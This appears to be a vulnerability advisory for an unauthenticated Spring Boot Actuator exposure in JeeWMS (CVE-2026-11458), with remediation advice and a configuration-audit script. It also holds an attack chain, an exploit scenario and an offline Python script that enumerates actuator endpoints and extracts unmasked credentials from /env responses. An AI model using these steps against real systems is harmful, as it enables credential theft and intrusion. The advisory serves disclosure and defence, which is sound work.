
JeeWMS EUVD-2026-34988 | CVE-2026-11458 (MEDIUM)
Information Exposure (CWE-200)
2026-06-07 · VulDB · GHSA-f5ww-rmh9-9wmc
Score 5.5 (CVSS 4.0, NVD)

Severity by source

NVD PRIMARY
5.5 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

Attack Vector (AV): Network
Attack Complexity (AC): Low
Attack Requirements (AT): None
Privileges Required (PR): None
User Interaction (UI): None
Confidentiality, vulnerable system (VC): Low
Integrity and Availability, vulnerable system (VI, VA): None
Subsequent system impact (SC, SI, SA): None
Exploit Maturity (E): Proof-of-Concept
Safety (S, supplemental): Not defined (X)

Lifecycle Timeline

Jun 07, 2026 09:22 · NVD · CVSS changed from 5.3 (MEDIUM) to 5.5 (MEDIUM)
Jun 07, 2026 08:43 · vuln.today · Analysis generated

Description (CVE.org)

A weakness has been identified in erzhongxmu JeeWMS up to 141740afb2ba14d441c82a833d0a418d07ca2d69. This issue affects some unknown processing of the file /base-boot/actuator of the component Boot Actuator Endpoint. Executing a manipulation can lead to information disclosure. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way.

Analysis (AI-generated)

Unauthenticated remote access to the Spring Boot Actuator endpoint in erzhongxmu JeeWMS exposes sensitive application internals to any network-reachable attacker. The /base-boot/actuator path, part of the Spring Boot management framework, is accessible without credentials, potentially leaking environment variables, configuration properties, internal service topology, and application health data. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Identify an internet-exposed JeeWMS instance
Delivery: Send an unauthenticated GET to /base-boot/actuator
Exploit: Enumerate the enabled sub-endpoints (env, beans, configprops)
Execution: Extract plaintext credentials or internal topology from the responses
Impact: Use the credentials to access backend systems

Vulnerability Assessment (AI-generated)

Exploitation: No special conditions are required. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) describes remote, unauthenticated exploitation with no attack requirements and no user interaction. The vector says nothing about configuration, so whether a given deployment is affected depends on the actuator being network-reachable and left at the exposure the attack chain above assumes. …
Risk Assessment: The earlier CVSS 3.1 score of 5.3 Medium (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) and the current CVSS 4.0 score of 5.5 Medium both reflect remote unauthenticated access with low confidentiality impact, but a "low" confidentiality rating likely understates real-world risk: an /env or /configprops response that contains plaintext database or cloud credentials turns an information disclosure into a foothold on backend systems, which is the Impact step of the attack chain above. …
Exploit Scenario: An unauthenticated attacker finds an internet-exposed JeeWMS instance through passive reconnaissance (for example, querying an internet-scan index such as Shodan for JeeWMS-specific banners or response headers) and confirms the exposure with a plain HTTP GET to /base-boot/actuator. A follow-up GET to /base-boot/actuator/env returns the Spring environment as JSON, which may include plaintext database connection strings, cloud storage credentials, or internal API keys. Spring Boot 2.x masks only values whose keys match its default sanitizer patterns (password, secret, key, token, credentials), so values stored under other key names, and a password passed as a JDBC URL query parameter, come back in clear; Spring Boot 3 masks every /env value unless management.endpoint.env.show-values is changed from its default of never. …
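The attack chain above and this exploit scenario, walked offline in Python as an added example (not JeeWMS code and not from this page): it parses a constructed copy of the HAL discovery document that GET /base-boot/actuator returns when the discovery page is enabled, lists which disclosure-grade sub-endpoints are present, and then picks out of a constructed /env response the values an attacker could actually reuse. The host wms.example.internal, every property name and every value are invented; the masking modelled is the Spring Boot 2.x default sanitizer, which hides only keys matching its default patterns (password, secret, key, token, credentials).

```python
"""Offline walk of the actuator attack chain: enumerate sub-endpoints, then triage /env.

Added example, not code from the JeeWMS project or from this page. Both JSON
documents are CONSTRUCTED samples shaped like Spring Boot 2.x responses; the
host, keys and values are invented.
"""
import json
import re
from urllib.parse import urlparse

# Constructed: discovery page returned by GET /base-boot/actuator
DISCOVERY_JSON = """
{"_links":{
  "self":{"href":"http://wms.example.internal/base-boot/actuator","templated":false},
  "health":{"href":"http://wms.example.internal/base-boot/actuator/health","templated":false},
  "env":{"href":"http://wms.example.internal/base-boot/actuator/env","templated":false},
  "env-toMatch":{"href":"http://wms.example.internal/base-boot/actuator/env/{toMatch}","templated":true},
  "beans":{"href":"http://wms.example.internal/base-boot/actuator/beans","templated":false},
  "configprops":{"href":"http://wms.example.internal/base-boot/actuator/configprops","templated":false},
  "heapdump":{"href":"http://wms.example.internal/base-boot/actuator/heapdump","templated":false}
}}
"""

# Constructed: /env response. Spring Boot 2.x masks keys ending in password/secret/key/token
# (and *credentials*) as "******"; DB_PASS, a JDBC URL carrying password= as a query
# parameter, and an unusually named header value are returned verbatim.
ENV_JSON = """
{"activeProfiles":["prod"],
 "propertySources":[
  {"name":"systemEnvironment","properties":{
     "DB_PASS":{"value":"Wint3r!2026"},
     "AWS_SECRET_ACCESS_KEY":{"value":"******"}}},
  {"name":"applicationConfig: [classpath:/application.properties]","properties":{
     "spring.datasource.url":{"value":"jdbc:mysql://10.20.0.5:3306/jeewms?user=wms&password=Wint3r!2026"},
     "spring.datasource.password":{"value":"******"},
     "oss.accessKeySecret":{"value":"******"},
     "wms.erp.callbackAuth":{"value":"Basic d21zOmVycDEyMw=="},
     "server.port":{"value":"8080"}}}
 ]}
"""

# Endpoints that return internals rather than liveness; these are the finding
HIGH_VALUE = {"env", "configprops", "beans", "heapdump", "threaddump", "mappings", "loggers", "jolokia", "shutdown"}

SECRET_NAME = re.compile(r"(pass|secret|token|credential|auth|key)", re.IGNORECASE)
CREDS_IN_VALUE = re.compile(r"(?i)(?:password|pwd|user)=|://[^/\s:@]+:[^/\s@]+@")


def enumerate_endpoints(discovery_body: str) -> dict:
    """Exploit step: map endpoint id -> URL path from the HAL _links of the discovery page."""
    links = json.loads(discovery_body)["_links"]
    found = {}
    for name, link in links.items():
        if name == "self" or link.get("templated"):
            continue  # skip the self link and templated children such as env/{toMatch}
        found[name] = urlparse(link["href"]).path
    return found


def leaked_properties(env_body: str) -> list:
    """Execution step: (source, key, value) for unmasked values an attacker can reuse.

    A value is reported when it is not masked and either its key looks credential-like
    or the value itself embeds credentials (password= parameter, user:pass@host).
    """
    hits = []
    for source in json.loads(env_body)["propertySources"]:
        for key, prop in source["properties"].items():
            value = str(prop.get("value", ""))
            if not value or value == "******":
                continue
            if SECRET_NAME.search(key) or CREDS_IN_VALUE.search(value):
                hits.append((source["name"], key, value))
    return hits


def triage(discovery_body: str, env_body: str) -> dict:
    """Combine both steps; /env is only parsed when the discovery page lists it."""
    endpoints = enumerate_endpoints(discovery_body)
    exposed = sorted(HIGH_VALUE & set(endpoints))
    leaks = leaked_properties(env_body) if "env" in endpoints else []
    return {"endpoints": endpoints, "high_value_exposed": exposed, "leaks": leaks}


if __name__ == "__main__":
    result = triage(DISCOVERY_JSON, ENV_JSON)
    print("exposed high-value endpoints:", ", ".join(result["high_value_exposed"]))
    for source, key, value in result["leaks"]:
        print(f"  LEAK {key} = {value!r}  (from {source})")
```

Against the constructed samples the triage lists beans, configprops, env and heapdump as exposed and reports three reusable values: DB_PASS, the JDBC URL with its embedded password, and the callback Authorization header, while the three masked keys are correctly ignored. The same parsing applies to a real response, which is why a Spring Boot 2.x /env should be treated as compromised credentials rather than a configuration leak.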
Remediation: No vendor-released patch has been identified at the time of analysis; the vendor did not respond to coordinated disclosure, and the project's rolling-release model means no fixed version can be named. … Until the project ships a fix, treat the actuator as a management interface: restrict management.endpoints.web.exposure.include to health, serve the actuator on a separate management port bound to loopback or a management network, require an authenticated role for /base-boot/actuator/**, and block the path at the reverse proxy.
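Because no vendor fix is identified, the controls available are configuration-side. The following is an added example (not JeeWMS code and not from this page): a Python audit of a Spring Boot application.properties that resolves which actuator endpoints the file would expose over HTTP and reports what a reviewer would flag. Both property files are constructed; WEAK_PROPERTIES reproduces the wildcard exposure that leaves /env reachable, HARDENED_PROPERTIES the compensating controls. The /base-boot context path is an assumption about how the observed URL could arise, not something the advisory states.

```python
"""Audit actuator exposure settings in a Spring Boot application.properties file.

Added example, not code from the JeeWMS project or from this page. Both property
files are CONSTRUCTED; server.servlet.context-path=/base-boot is an assumption.
"""
import re

WEAK_PROPERTIES = """
# constructed: wildcard exposure on the application port
server.port=8080
server.servlet.context-path=/base-boot
management.endpoints.web.exposure.include=*
"""

HARDENED_PROPERTIES = """
# constructed: health only, on a loopback-bound management port, no /env values
server.port=8080
server.servlet.context-path=/base-boot
management.endpoints.web.exposure.include=health
management.endpoints.web.exposure.exclude=env,beans,configprops,heapdump,threaddump,mappings,loggers
management.endpoint.env.show-values=never
management.endpoint.configprops.show-values=never
management.endpoint.heapdump.enabled=false
management.server.port=9090
management.server.address=127.0.0.1
"""

# Endpoints that disclose internals or change runtime state (the attack chain enumerates env, beans, configprops)
HIGH_VALUE = {"env", "configprops", "beans", "heapdump", "threaddump", "mappings", "loggers", "shutdown"}
KNOWN = HIGH_VALUE | {"health", "info", "metrics"}  # what "*" expands to in this model
DEFAULT_INCLUDE = {"health"}                         # Spring Boot's default web exposure
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_properties(text: str) -> dict:
    """Minimal .properties parser: key=value or key: value, '#'/'!' comment lines."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def _csv(value: str) -> set:
    return {v.strip() for v in value.split(",") if v.strip()}


def exposed_endpoints(props: dict) -> set:
    """What Spring Boot would serve over HTTP: include minus exclude, minus disabled endpoints."""
    include = _csv(props.get("management.endpoints.web.exposure.include", "")) or set(DEFAULT_INCLUDE)
    if "*" in include:
        include = set(KNOWN)
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    if "*" in exclude:
        return set()
    enabled_by_default = props.get("management.endpoints.enabled-by-default", "true").lower() == "true"

    def is_enabled(endpoint: str) -> bool:
        explicit = props.get(f"management.endpoint.{endpoint}.enabled")
        if explicit is not None:
            return explicit.lower() == "true"
        # shutdown is the one endpoint Spring Boot ships disabled even when included
        return enabled_by_default and endpoint != "shutdown"

    return {ep for ep in include - exclude if is_enabled(ep)}


def audit(text: str) -> list:
    """Return findings as strings; an empty list means the file passes this check."""
    props = parse_properties(text)
    exposed = exposed_endpoints(props)
    findings = []
    risky = sorted(exposed & HIGH_VALUE)
    if risky:
        findings.append("disclosure-grade actuator endpoints exposed over HTTP: " + ", ".join(risky))
    if "env" in exposed and props.get("management.endpoint.env.show-values", "").lower() != "never":
        findings.append("/env exposed without show-values=never (Spring Boot 2.x has no such switch; "
                        "keys the default sanitizer does not match are returned in clear)")
    mgmt_port = props.get("management.server.port")
    if mgmt_port is None or mgmt_port == props.get("server.port"):
        findings.append("actuator served on the application port; reachable by anyone who can reach the app")
    elif props.get("management.server.address", "") not in LOOPBACK:
        findings.append("management port bound to all interfaces; set management.server.address=127.0.0.1 or firewall it")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_PROPERTIES), ("hardened", HARDENED_PROPERTIES)):
        print(f"[{label}] exposed={sorted(exposed_endpoints(parse_properties(text)))}")
        for finding in audit(text):
            print("   -", finding)
```

The property names are Spring Boot's own (management.endpoints.web.exposure.include/exclude, management.endpoint.<id>.enabled, management.endpoint.env.show-values, management.server.port and management.server.address). Configuration only shrinks the surface: if the actuator must stay reachable on the application port, additionally require an authenticated role for it, for example with Spring Security's EndpointRequest.toAnyEndpoint() request matcher, or block /base-boot/actuator at the reverse proxy.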
